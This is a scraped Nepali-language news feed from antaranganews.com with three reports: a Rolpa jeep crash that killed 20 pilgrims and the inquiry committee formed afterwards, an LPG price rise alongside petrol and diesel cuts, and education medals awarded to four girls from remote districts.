https://www.antaranganews.com/?p=48534#respondFri, 01 May 2026 03:54:09 +0000https://www.antaranganews.com/?p=48534जलजला(रोल्पा)– रोल्पामा तीर्थयात्री सवार जीप दुर्घटना हुँदा मृत्यु हुनेको संख्या २० पुगेको छ । उद्धार कार्य जारी रहेको प्रहरीले जनाएको छ । रोल्पाको जलजला क्षेत्रमा लाग्ने वैशाख पूर्णिमा जात्रामा पूजा गर्न रुकुम पूर्वबाट तीर्थयात्री बोकेर गएको जीप वैशाख १७ गते दिउँसो दुर्घटना हुँदा भारी संख्यामा मानिसहरूको निधन हुन गएको प्रहरीले जनाएको छ ।
भौगोलिक विकटताका कारण शव संकलन गरी घटनास्थल नजिकै राखिएको छ । उद्धार कार्यमा हेलिकप्टर समेत प्रयोग गर्ने गरी तयारी गरिएको प्रमुख जिल्ला अधिकारी क्षेत्रीले जानकारी दिनुभयो । उहाँले भन्नुभयो, ‘सबै शवको संकलन भइसकेको जानकारी दिँदै उनले उद्धार कार्य सकिए पश्चात् आज नै सबैको पहिचान गरी परिवारको जिम्मा दिइने छ ।’
आज बिहानैबाट सुरक्षाकर्मीहरू घटनास्थलमा परिचालित भइसकेको रोल्पाका प्रमुख जिल्ला अधिकारी गंगाबहादुर क्षेत्रीले बताउनु भयो । उहाँका अनुसार आज शव पहिचान गरी आफन्तलाई जिम्मा लगाउने काम सुरु हुने छ । उहाँले भन्नुभयो, ‘आज बिहानैदेखि तीनै तहका सुरक्षाकर्मी परिचालन गरेर उद्धार कार्य अघि बढाइएको छ ।’
सो दुर्घटनामा २० जनाको मृत्यु पुष्टि भएको छ । मृत्यु हुनेमा १२ जना महिला, ४ जना पुरुष र ४ जना बालक छन् । सबै शव सडकसम्म ल्याएपछि मात्र पहिचान प्रक्रिया सहज हुने प्रजिअ क्षेत्रीले बताउनुभयो ।
रुकुमपूर्व सिस्ने गाउँपालिका–५ का ३२ वर्षीय समिर कामी घाइते छन् । उनलाई राति नै रुकुम पूर्व अस्पतालबाट बाहिर रिफर गरिएको छ ।
खोज तलासका क्रममा दुर्घटनास्थलमा २० जनाको शव फेला परेको जिल्ला प्रहरी प्रवक्ता प्रहरी निरीक्षक सुनिल थापा नेपालीले बताउनुभयो । उहाँका अनुसार जिप दिउँसो करिब पौने ३ बजेतिर थवाङ गाउँपालिका– १ सल्यापको सडकबाट लु १ ज ४१६७ नम्बरको जिप झन्डै आठ सय मिटरतल खसेको थियो ।
उहाँले भन्नुभयो, ‘रूकुम पूर्वको सिस्ने गाउँपालिका– ५ का ३२ वर्षीय समिर कामी घाइते छन् । उनको बायाँ खुट्टा, निधार र बायाँ आँखामा चोट रहेको तथा अवस्था मध्यम रहेको छ । बोल्ने सक्ने अवस्थाका उनको आधारभूत जलजला अस्पताल थवाङ रोल्पामा उपचार भइरहेको जिल्ला प्रहरी प्रवक्ता प्रहरी निरीक्षक सुनिल थापा नेपालीले जानकारी दिनुभयो । उहाँका अनुसार उनी उछिट्टिएर घाइते अवस्थामा फेला परेका हुन् । उहाँले भन्नुभयो, ‘दुर्घटनामा परेको जिप सिस्ने गाउँपालिका– ५ टाकुराका बेदबहादुर बिकले चलाएका थिए ।’
दुर्घटनास्थल अत्यन्तै अप्ठ्यारो भएकाले शवहरू सडकसम्म ल्याउन कठिन भइरहेको छ । हालसम्म ३ वटा शव मात्रै सडकमा ल्याइएको छ भने अन्यको उद्धार कार्य जारी रहेको प्रहरी भनाइ छ ।
घटनास्थल जटिल भूगोल हुनुका साथै पानी परिरहेको हुँदा उद्धार कार्यमा ढिलाइ भएको रोल्पाका प्रहरी प्रमुख डिएसपी वीरेन्द्रवीर विश्वकर्माले बताउनु भयो । उहाँका अनुसार दुर्घटनामा ज्यान गुमाउनेहरू वैशाख पूर्णिमाका दिन रोल्पाको जलजलामा लाग्ने ठूलो मेलाका लागि त्यता जाँदै थिए । उहाँले भन्नुभयो, ‘सो जिप दुर्घटनामा परी १८ जनाको घटनास्थलमै मृत्यु, १ जना घाइते अवस्थामा उद्धारको क्रममा फेला परेका थिए ।’
घटनास्थल जटिल भूगोल हुनुका साथै पानी परिरहेको हुँदा उद्धार कार्यमा ढिलाइ भएको डिएसपी विश्वकर्माले जानकारी दिनु भयो । छानबिन गर्न समिति गठन :
यसैबीच, गृह मन्त्रालयले रोल्पाको थवाङ गाउँपालिका– १ सल्यापमा हिजो भएको जिप दुर्घटनाको छानबिन गर्न समिति गठन गरेको छ । मन्त्रालयले सचिवस्तरको निर्णयबाट लुम्बिनी प्रदेश प्रहरी कार्यालय तुलसीपुरका प्रहरी उपरीक्षक यादव ढकालको संयोजकत्वमा चार सदस्यीय समिति गठन गरेको हो ।
सो समितिमा जिल्ला प्रहरी कार्यालय रोल्पाका प्रहरी नायब उपरीक्षक, सशस्त्र प्रहरी बल रोल्पाका सशस्त्र प्रहरी नायब उपरीक्षक र जिल्ला प्रशासन कार्यालय रोल्पाका प्रशासकीय अधिकृत सदस्य रहनुभएको गृह मन्त्रालयका सूचना अधिकारी रमा आचार्य सुवेदीले बताउनु भयो ।
उहाँका अनुसार समितिलाई घटनाको सत्य तथ्य अध्ययन गरी तीन दिनभित्र प्रतिवेदन पेस गर्ने जिम्मेवारी दिइएको छ । उहाँले भन्नुभयो, ‘समितिलाई दुर्घटनाको कारण तथा लापरबाही र कमजोरी पत्ता लगाई तथा आगामी दिनमा दुर्घटना न्यूनीकरणका लागि चाल्नुपर्ने कदमबारे सुझाव दिने कार्यादेश दिइएको छ ।’
]]>https://www.antaranganews.com/?feed=rss2&p=485340बढ्यो खाना पकाउने एलपी ग्यासको मूल्य : विद्युतीय चुल्होप्रतिको आकर्षण बढ्दै
https://www.antaranganews.com/?p=48526
https://www.antaranganews.com/?p=48526#respondFri, 01 May 2026 00:44:47 +0000https://www.antaranganews.com/?p=48526काठमाडौं– नेपाल आयल निगमले खाना पकाउने एलपी ग्यासको मूल्य बढाएको छ । निगमले आज राति १२ बजेबाट खाना पकाउने ग्यासको मूल्य २ हजार १ सय ६० रुपैयाँ कायम गरेको प्रेस विज्ञप्ति जारी गर्दै निगमले वैशाख १७ गते जनाएको हो ।
निगमले पेट्रोल, मट्टितेल र डिजेलको मूल्य भने घटेको विज्ञप्तिमा उल्लेख गरेको छ ।
समायोजनपछि अब खाना पकाउने एलपी ग्यासको मूल्य १४.२ केजीलाई २१६० रुपैयाँ पर्ने निगमले जनाएको छ । निगमका अनुसार अब ७.१ केजी (आधा सिलिन्डर) को १०८० पर्नेछ ।
यसअघि पूरा सिलिण्डर ग्यासको मूल्य २ हजार १० कायम थियो भने आधा सिलिण्डरको १ हजार ५ रुपैयाँ कायम थियो ।
एलपी ग्यासको मूल्य बढेसँगै विद्युतीय चुल्होप्रति उपभोक्ताको आकर्षण बढ्ने भएको आंकलन गरिएको छ । मुलुकमा उत्पादिन विद्युतको खपतका लागि पनि विद्युतीय चुल्होको प्रयोग जरुरी देखिन्छ ।
यसैबीच, निगमले पेट्रोल र डिजेलको मूल्य भने घटाएको छ । निगमले पेट्रोलमा प्रतिलिटर २ रुपैयाँ, डिजेल र मट्टितेलमा प्रतिलिटर १२ रुपैयाँ घटाइएको जनाएको छ ।
यसैगरी, हवाई इन्धन आन्तरिकतर्फ प्रतिलिटर ७ रुपैयाँ र हवाई इन्धन अन्तर्राष्ट्रियतर्फ अमेरिकी डलर ४६ ले बढाइएको विज्ञप्तिमा उल्लेख छ ।
समायोजनपछि पेट्रोलको मूल्य प्रतिलिटर क्रमशः पहिलो वर्गमा २१४.५०, दोस्रो वर्गमा २१६ र तेस्रो वर्गमा २१७ रुपैयाँ कायम गरिएको छ । डिजेल र मट्टितेलको मूल्य प्रतिलिटर पहिलो वर्गमा २२२.५० दोस्रो वर्गमा २२४ र तेस्रो वर्गमा २२५ पुगेको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=485260नइद्वारा दुर्गमका चार छात्रालाई नइ कपिल विद्या पदक प्रदान
https://www.antaranganews.com/?p=36878
https://www.antaranganews.com/?p=36878#respondThu, 27 Nov 2025 15:45:53 +0000https://www.antaranganews.com/?p=36878काठमाडौं– नइ एकेडेमीद्वारा दुर्गमका चार जना छात्रालाई नइ कपिल विद्या पदक प्रदान गरिएको छ । ती चारै जना छात्रालाई अनलाइनबाट मंसिर ८ गते पुरस्कारका राशि प्रदान गरिएको हो । उनीहरूलाई चार दुर्गम जिल्लाका छात्राहरू २०८२ सालका सर्वोत्कृष्ट घोषित भएका हुन् ।
डोल्पा, हुम्ला, बाजुरा र दार्चुला जिल्लाका सर्वश्री सुमित्रा बूढा, सौमती शाही, प्रतीक्षा विष्ट र इशारा कोट्टारीलाई जनही तीसतीस हजार रुपैयाँ राशि सहित ‘नइ कपिल विद्यापदक’ समर्पण गरिएको छ ।
चारै जना छात्रालाई अनलाइनबाट पुरस्कारका राशि प्रदान गरिएको हो । चार दुर्गम जिल्लाका छात्राहरू २०८२ सालका सर्वोत्कृष्ट घोषित भएका हुन् ।
चार जिल्लाका सरकारी स्कुलबाट कक्षा १२ का छात्रामध्ये सर्वोत्कृष्टलाई ‘नइ कपिल विद्या पदक’ प्रदान हुँदै आएको नइ एकेडेमीका सदस्यसचिव नरेन्द्रराज प्रसाईले बताउनु भएको छ । उहाँका अनुसार सर्वोत्कृष्ट घोषित छात्राहरू डोल्पाको आदर्श स्कुल, हुम्लाको मानसरोवर स्कुल, बाजुराको जनप्रकाश स्कुल र दार्चुलाको लटीनाथ स्कुलका रहेका छन् ।
नइ एकेडेमीका सदस्यसचिव प्रसाईले भन्नुभयो, ‘नइ एकेडेमीले २०७९ सालदेखि सुप्रसिद्ध मनोचिकित्सक डा. कपिलदेव उपाध्यायका सम्मानमा बर्षेनी ‘नइ कपिल विद्यापदक’ समर्पण गर्दै आएको छ ।’
]]>https://www.antaranganews.com/?feed=rss2&p=368780